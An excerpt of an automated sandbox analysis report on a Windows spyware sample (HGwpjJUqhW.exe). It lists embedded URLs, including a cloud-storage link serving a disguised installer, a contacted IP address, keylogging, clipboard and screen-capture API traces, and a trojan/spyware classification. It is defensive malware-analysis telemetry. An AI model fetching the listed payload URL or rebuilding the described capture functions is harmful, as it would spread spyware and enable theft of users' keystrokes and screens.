                              Source: HGwpjJUqhW.exe, 00000000.00000002.2089647965.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1711279414.00000000006BE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1754315822.00000000030F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1785995054.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2017790837.0000000003432000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2008946205.0000000000982000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                              Source: powershell.exe, 00000014.00000002.2008946205.00000000009BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                              Source: powershell.exe, 00000008.00000002.1786185613.00000000083CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microl
                              Source: powershell.exe, 00000008.00000002.1779750961.00000000074F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microo
                              Source: HGwpjJUqhW.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                              Source: HGwpjJUqhW.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                              Source: HGwpjJUqhW.exeString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                              Source: HGwpjJUqhW.exe, 00000000.00000002.2094122035.00000000038BC000.00000004.00000010.00020000.00000000.sdmp, HGwpjJUqhW.exe, 00000000.00000002.2089647965.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                              Source: pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                              Source: HGwpjJUqhW.exe, 00000000.00000002.2089647965.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                              Source: HGwpjJUqhW.exe, 00000000.00000002.2089647965.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                              Source: pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                              Source: pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                              Source: pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                              Source: pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                              Source: HGwpjJUqhW.exe, 00000000.00000002.2089647965.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
                              Source: pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                              Source: HGwpjJUqhW.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                              Source: HGwpjJUqhW.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                              Source: HGwpjJUqhW.exeString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                              Source: powershell.exe, 00000003.00000002.1717507853.000000000549B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1767043367.0000000005E2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1800870184.00000000056DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2042669213.000000000639A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                              Source: HGwpjJUqhW.exeString found in binary or memory: http://ocsp.comodoca.com0
                              Source: HGwpjJUqhW.exe, 00000000.00000002.2089647965.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: http://ocsp.digicert.com0
                              Source: HGwpjJUqhW.exe, 00000000.00000002.2094122035.00000000038BC000.00000004.00000010.00020000.00000000.sdmp, HGwpjJUqhW.exe, 00000000.00000002.2089647965.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
                              Source: HGwpjJUqhW.exe, 00000000.00000002.2094122035.00000000038BC000.00000004.00000010.00020000.00000000.sdmp, HGwpjJUqhW.exe, 00000000.00000002.2089647965.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
                              Source: pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: http://ocsp.digicert.com0N
                              Source: HGwpjJUqhW.exe, 00000000.00000002.2089647965.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: http://ocsp.digicert.com0X
                              Source: HGwpjJUqhW.exeString found in binary or memory: http://ocsp.sectigo.com0
                              Source: powershell.exe, 00000013.00000002.2020722103.0000000005486000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2017790837.00000000033E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                              Source: pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: http://qm.qq.com/cgi-bin/qm/qr?_wv=1027&k=F9S8-ZvivQQpcIjryW3M07yMoqKIlO5q&authKey=7DTLBVVH1YWYIIU%2
                              Source: powershell.exe, 00000003.00000002.1712398969.0000000004586000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1755109484.00000000053C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1755109484.0000000004F17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1789380483.00000000047C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2020722103.0000000005914000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2020722103.0000000005486000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                              Source: powershell.exe, 00000003.00000002.1712398969.0000000004431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1755109484.0000000004DC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1789380483.0000000004671000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2020722103.000000000534F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2013489390.0000000004656000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: powershell.exe, 00000003.00000002.1712398969.0000000004586000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1755109484.00000000053C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1755109484.0000000004F17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1789380483.00000000047C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2020722103.0000000005914000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2020722103.0000000005486000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                              Source: powershell.exe, 00000013.00000002.2020722103.0000000005486000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2017790837.00000000033E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                              Source: HGwpjJUqhW.exe, 00000000.00000002.2089647965.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
                              Source: powershell.exe, 00000008.00000002.1751816167.0000000000DC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                              Source: powershell.exe, 00000003.00000002.1725044947.0000000007DA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.q
                              Source: pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: http://www.openssl.org/support/faq.html
                              Source: pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: http://www.openssl.org/support/faq.html.
                              Source: powershell.exe, 00000003.00000002.1712398969.0000000004431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1755109484.0000000004DC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1789380483.0000000004671000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2020722103.0000000005331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2013489390.000000000463A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2013489390.0000000004626000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                              Source: powershell.exe, 0000000B.00000002.1789380483.00000000047C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                              Source: HGwpjJUqhW.exe, 00000000.00000002.2089647965.0000000000A36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/
                              Source: HGwpjJUqhW.exe, 00000000.00000002.2089647965.0000000000A36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/;%
                              Source: HGwpjJUqhW.exe, 00000000.00000002.2089647965.0000000000A36000.00000004.00000020.00020000.00000000.sdmp, HGwpjJUqhW.exe, 00000000.00000002.2089647965.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, HGwpjJUqhW.exe, 00000000.00000002.2094392155.0000000003EA0000.00000004.00000020.00020000.00000000.sdmp, HGwpjJUqhW.exe, 00000000.00000002.2089647965.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, HGwpjJUqhW.exe, 00000005.00000002.4132173030.000000000019D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/pc_yyb_2700200680_installer.exe
                              Source: HGwpjJUqhW.exe, 00000000.00000002.2089647965.0000000000AAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/pc_yyb_2700200680_installer.exe/l
                              Source: HGwpjJUqhW.exe, 00000000.00000002.2089647965.0000000000A91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/pc_yyb_2700200680_installer.exe;
                              Source: HGwpjJUqhW.exe, 00000000.00000002.2089647965.0000000000A36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/pc_yyb_2700200680_installer.exef2
                              Source: HGwpjJUqhW.exe, 00000000.00000002.2089647965.0000000000AAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/pc_yyb_27R
                              Source: powershell.exe, 00000013.00000002.2042669213.000000000639A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                              Source: powershell.exe, 00000013.00000002.2042669213.000000000639A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                              Source: powershell.exe, 00000013.00000002.2042669213.000000000639A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                              Source: pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: https://curl.se/docs/alt-svc.html
                              Source: pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: https://curl.se/docs/hsts.html
                              Source: pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: https://curl.se/docs/http-cookies.html
                              Source: powershell.exe, 00000013.00000002.2020722103.0000000005486000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2017790837.00000000033E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                              Source: powershell.exe, 00000008.00000002.1755109484.000000000571A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1755109484.00000000054F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2020722103.0000000005A63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                              Source: powershell.exe, 0000000B.00000002.1806516664.000000000701C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5
                              Source: powershell.exe, 00000003.00000002.1717507853.000000000549B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1767043367.0000000005E2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1800870184.00000000056DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2042669213.000000000639A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                              Source: HGwpjJUqhW.exeString found in binary or memory: https://sectigo.com/CPS0
                              Source: HGwpjJUqhW.exe, 00000000.00000002.2094122035.00000000038BC000.00000004.00000010.00020000.00000000.sdmp, HGwpjJUqhW.exe, 00000000.00000002.2089647965.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: https://sj.qq.com/pcsem/download?supply_id=2700200680&ocpc=0&landing_type=pcyyb&keyword_id=172610888
                              Source: pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: https://support.qq.com/product/
                              Source: pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: https://txc.qq.com/static/desktop/img/products/def-product-logo.png
                              Source: pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: https://www.digicert.com/CPS0
                              Source: HGwpjJUqhW.exe, HGwpjJUqhW.exe.0.drString found in binary or memory: https://www.incredibuild.com
                              Source: pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: https://yybadaccess.3g.qq.com/pc_yyb/pcyyb_get_downloader_policy
                              Source: pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: https://yybadaccess.3g.qq.com/pc_yyb_client/pcyyb_get_app_detail
                              Source: pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: https://yybadaccess.3g.qq.com/pc_yyb_client/pcyyb_get_app_detailwmpf_dataAndrows.exeABoxHeadless.exe
                              Source: pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: https://yybadaccess.3g.qq.com/pcyybopen/pcyyb_recall
                              Source: pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: https://yybadaccess.3g.qq.com/upload/callback_log?remote_path=
                              Source: pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: https://yybadaccess.3g.qq.com/v3/pcyyb_client_update
                              Source: pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: https://yybadaccess.sparta.html5.qq.com/pc_yyb/pcyyb_get_downloader_policy
                              Source: pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: https://yybadaccess.sparta.html5.qq.com/pc_yyb/pcyyb_get_downloader_policyhttps://yybadaccess.3g.qq.
                              Source: pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: https://yybadaccess.sparta.html5.qq.com/pcyybopen/pcyyb_recall
                              Source: pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: https://yybadaccess.sparta.html5.qq.com/pcyybopen/pcyyb_recallhttps://yybadaccess.3g.qq.com/pcyybope
                              Source: pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: https://yybadaccess.sparta.html5.qq.com/upload/callback_log?remote_path=
                              Source: pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: https://yybadaccess.sparta.html5.qq.com/v3/pcyyb_client_update
                              Source: pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drString found in binary or memory: https://yybadaccess.sparta.html5.qq.com/v3/pcyyb_client_updatehttps://yybadaccess.3g.qq.com/v3/pcyyb
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                              Source: unknownHTTPS traffic detected: 47.79.48.211:443 -> 192.168.2.4:49735 version: TLS 1.2

                              Key, Mouse, Clipboard, Microphone and Screen Capturing

                              barindex
                              Contains functionality to capture and log keystrokes
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: [esc]5_2_0362E850
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: [esc]5_2_0362E850
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: [esc]5_2_0362E850
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: [esc]5_2_0362E850
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_0362E850 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,5_2_0362E850
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_0362E850 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,5_2_0362E850
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_0362BC70 GetDesktopWindow,GetDC,GetDC,CreateCompatibleDC,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,StretchBlt,_memset,GetDIBits,_memset,DeleteObject,DeleteObject,ReleaseDC,DeleteObject,DeleteObject,ReleaseDC,5_2_0362BC70
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_0362E4F0 Sleep,CreateMutexW,GetLastError,SHGetFolderPathW,lstrcatW,CreateMutexW,WaitForSingleObject,CreateFileW,GetFileSize,CloseHandle,DeleteFileW,ReleaseMutex,DirectInput8Create,GetTickCount,GetKeyState,5_2_0362E4F0
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeWindows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dllJump to behavior
                              Source: Yara matchFile source: HGwpjJUqhW.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.HGwpjJUqhW.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1671781833.00000000006F9000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: HGwpjJUqhW.exe PID: 7344, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe, type: DROPPED
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeProcess Stats: CPU usage > 49%
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeCode function: 0_2_026218A7 GetModuleHandleA,CreateWindowExW,SendMessageW,CreateThread,PostQuitMessage,NtdllDefWindowProc_W,0_2_026218A7
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_0362B463 ExitWindowsEx,5_2_0362B463
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_0362B43F ExitWindowsEx,5_2_0362B43F
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_0362B41B ExitWindowsEx,5_2_0362B41B
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeCode function: 0_2_100167210_2_10016721
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeCode function: 0_2_026200320_2_02620032
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeCode function: 0_2_026366F80_2_026366F8
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00C6B4903_2_00C6B490
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_08203EA83_2_08203EA8
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_03626EE05_2_03626EE0
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_03626C505_2_03626C50
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_0363E3415_2_0363E341
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_036383815_2_03638381
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_0363EA1D5_2_0363EA1D
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_036289005_2_03628900
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_0363F9FF5_2_0363F9FF
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_0363D89F5_2_0363D89F
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_0363DDF05_2_0363DDF0
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_036224B05_2_036224B0
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_02C4122F5_2_02C4122F
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_02C41E5C5_2_02C41E5C
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_02C3B66A5_2_02C3B66A
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_02C417805_2_02C41780
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_02C40CDE5_2_02C40CDE
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_02C324B05_2_02C324B0
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_02C42D915_2_02C42D91
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_028800325_2_02880032
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_028912065_2_02891206
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_0288B6415_2_0288B641
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_028917575_2_02891757
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_028824875_2_02882487
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_02890CB55_2_02890CB5
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_02892D685_2_02892D68
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_034BF3BE5_2_034BF3BE
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_034BD25E5_2_034BD25E
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_034A82BF5_2_034A82BF
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_034A689F5_2_034A689F
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_034BD7AF5_2_034BD7AF
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_034A1E6F5_2_034A1E6F
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_034A660F5_2_034A660F
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_034B7D405_2_034B7D40
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_034BDD005_2_034BDD00
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: String function: 03634300 appears 32 times
                              Source: HGwpjJUqhW.exeStatic PE information: invalid certificate
                              Source: pc_yyb_2700200680_installer[1].exe.0.drStatic PE information: Resource name: CUSTOM type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Source: pc_yyb_2700200680_installer[1].exe.0.drStatic PE information: Resource name: ZIPRES type: Zip archive data, at least v2.0 to extract, compression method=deflate
                              Source: pc_yyb_2700200680_installer.exe.0.drStatic PE information: Resource name: CUSTOM type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Source: pc_yyb_2700200680_installer.exe.0.drStatic PE information: Resource name: ZIPRES type: Zip archive data, at least v2.0 to extract, compression method=deflate
                              Source: HGwpjJUqhW.exeBinary or memory string: OriginalFilenameV vs HGwpjJUqhW.exe
                              Source: HGwpjJUqhW.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@29/29@1/2
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_03627B70 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,5_2_03627B70
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_03627740 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,5_2_03627740
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_03627620 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,OpenProcess,5_2_03627620
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_03626C50 wsprintfW,MultiByteToWideChar,GetDriveTypeW,GetDiskFreeSpaceExW,_memset,GlobalMemoryStatusEx,swprintf,swprintf,5_2_03626C50
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeCode function: 0_2_10001FA0 CreateToolhelp32Snapshot,memset,Process32FirstW,WideCharToMultiByte,CloseHandle,Process32NextW,CloseHandle,0_2_10001FA0
